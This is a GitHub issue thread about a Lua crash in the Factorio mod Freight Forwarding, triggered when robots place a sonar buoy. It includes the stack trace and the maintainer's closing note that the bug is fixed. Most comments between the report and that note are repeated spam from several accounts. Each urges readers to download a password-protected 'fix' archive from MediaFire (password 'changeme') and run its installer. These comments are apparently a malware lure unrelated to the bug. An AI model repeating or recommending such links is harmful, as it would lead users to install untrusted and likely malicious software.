### ISSUE TITLE
Game crashes when placing sonar buoy with robot

### ISSUE THREAD

**Issue by Sharpened99** [tburrows13/FreightForwarding#27]
When placing a sonar buoy via construction bots, the game crashes with the following error message:

```
The mod Freight Forwarding (1.9.0) caused a non-recoverable error.
Please report this error to the mod author.

Error while running event FreightForwarding::on_robot_built_entity (ID 14)
__FreightForwarding__/scripts/sonar-scanning.lua:305: bad argument #2 of 2 to 'get_player' (string expected, got nil)
stack traceback:
	[C]: in function 'get_player'
	__FreightForwarding__/scripts/sonar-scanning.lua:305: in function 'handler'
	__core__/lualib/event_handler.lua:47: in function <__core__/lualib/event_handler.lua:45>
```

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by tburrows13** [comment]
Thanks, fixed in cb9c178.
